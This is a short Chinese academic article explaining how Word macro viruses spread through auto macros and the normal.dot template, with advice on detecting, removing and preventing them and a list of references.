摘要:宏病毒的出现对办公软件的安全使用带来了极大的威胁,故文章在深入研究宏病毒作用机制的基础上,从发现病毒、清除病毒以及预防病毒三个方面对其防治方法进行了探析,以供参考。
关键词:宏病毒作用机制防治方法
前言:微软公司的microsoft word 几乎已经成为目前全世界办公文档的事实工业标准,而宏病毒就是是针对的字处理软件word 编写的一种病毒,其种类达数百种,危害日甚一日,感染率高达40%以上,已成为威胁计算机信息系统安全的主要因素。
因此,对其作用机制进行深入研究,制定切实有效的防治方法,从而最大限度地降低病毒带来的危害是十分必要的。
1.宏病毒的作用机制
word 的文件建立是通过模板来创建的,模板是为了形成最终文档而提供的特殊文档,模板可以包括以下几个元素: 菜单、宏、格式( 如备忘录等)。
word 处理文档需要同时进行各种不同的动作,如打开文件、关闭文件、读取数据资料以及储存和打印等等。
每一种动作其实都对应着特定的宏命令。
通常,word 宏病毒至少会包含一个以上的自动宏( 如autoopen、autoclose、autoexec、autoexit和autonew 等) ,或者是一个以上的标准宏,如fileopen、filesaveas等。
如果某个.doc 文件感染了这类word 宏病毒,则当word 运行这类自动宏时,实际上就是运行了病毒代码。
一旦病毒宏侵入word 系统,它就会替
代原有的正常宏,如fileopen、filesave、filesaveas 和fileprint 等,并通过这些宏所关联的文件操作功能获取对文件交换的控制。
当某项功能被调用时,相应的病毒宏就会篡夺控制权,实施病毒所定义的非法操作,包括传染操作、表现操作以及破坏操作等。
宏病毒主要寄生于autoopen、autoclose 和autonew 3 个宏中,其引导、传染、表现或破坏均通过宏指令来完成的。
宏指令是用宏语言word basic 编写的,宏语言提供了许多系统级底层功能调用,因此,宏病毒利用宏语言实现其传染、表现或破坏的目的。
目前,几乎所有已知的宏病毒都沿用了相同的作用机理,即如果word 系统在读取一个染毒文件时遭受感染,则其后所有新创建的doc 文件都会被感染。
word 宏病毒几乎是唯一可跨越不同硬件平台而生存、传染和流行的一类病毒。
同时,由于word 允许对宏本身进行加密操作,因此有许多宏病毒是经过加密处理的,不经过特殊处理是无法进行编辑或观察的,这也是很多宏病毒无法手工杀除的主要原因。
2.宏病毒防治方法
2.1 发现word 宏病毒
尽管宏病毒的破坏性较大,而且具有一定的隐蔽性,采用常规的文件型病毒判定方法不能判断宏病毒的存在。
但根据宏病毒的传染机制,不难看出宏病毒传染中的特点。
所以通过以下方法可简单地判断某文档是否感染了宏病毒。
(1)在使用的word 中打开宏菜单,点中normal 模板,若发
现有autoopen、autonew、autoclose 等自动宏以及filesave、filesaveas、fileexit 等文件操作宏或一些怪名字的宏,如aaazao、payload 等,而自己又没有加载特殊模板,这就极可能是病毒在作祟了,因为大多数normal 模板中是不包含上述宏的。
(2)如发现打开一个文档,它未经任何改动,立即提示存盘操作,也有可能是word 带有病毒。
(3)打开以.doc 为后缀的文件在另存菜单中只能以模板方式存盘,而此时通用模板中含有宏,也有可能是word 有病毒。
2.2 清除word 宏病毒
清除宏病毒有两种方法,即手工清除和用杀毒工具清除:
(1)手工清除宏病毒
手工清除宏病毒步骤:①打开宏菜单,在通用模板中删除您认为是病毒的宏;②打开带有病毒宏的文档(模板) ,然后打开宏菜单,在通用模板和病毒文件名模板中删除您认为是病毒的宏;③保存清洁文档;④对剩余文件重复步骤①~③。
手工清除宏病毒有一定难度,而且不彻底,最好还是用杀毒软件清除安全可靠。
(2)用杀毒工具自动清除宏病毒
用杀毒工具自动清除宏病毒是理想的解决办法。
目前反病毒软件都具有对已知宏病毒杀除的功能,而且有的软件还能对未知病毒报警。
2.3 预防宏病毒
从宏病毒的特性和传播途径看,预防宏病毒的方法应从以下方面入手:
(1)对于已染病毒的文件首先应将normal .dot 中的自动宏清除( autoopen、auto-close、autonew) ,然后将normal .dot 置成只读方式。
(2)对于其他已染毒的文件均应将自动宏清除,这样就可以达到清除病毒的目的。
(3)平时使用时要加强预防。
对来历不明的宏最好予以删除。
如果发现后缀为.doc的文件变成模板时,则可怀疑其已染宏病毒,其主要表现是在saveas 文档时,选择文件类型的框变为灰色。
(4)在打开文件时,按住sh ift 键可以阻止自动宏的运行。
例如,当您用含有autonew宏的模板新建一个文档时,在“新建”对话框(“文件”菜单) 中单击“确定”按钮时按住shift 键,就可以阻止autonew 宏的执行。
您要按住shift 键直到新文档显示在窗口中。
在可以触发自动宏的宏中,您可以用disable auto macros 阻止运行自动宏。
(5)安装反病毒软件,启用实时反病毒功能,检查外来病毒包括int ernet、bbs 病毒对系统的入侵。
只有检查后,方可使用。
参考文献:
[1]王素芳.《word宏病毒简析》.科技信息(科学教研),2008
[2]梁玲.《宏病毒感染过程及防范措施研究》.科技情报开发与经济,2009
[3]高永仁.《预防和清除宏病毒的方法》.网络安全技术与应用,2007
[4]孙领弟,马彦芬.《word宏病毒的产生和清除方法》.河北工程技术高等专科学校学报,2002
[5]刘兴权.《关于word宏病毒的分析与防治》.山西电子技术,2001。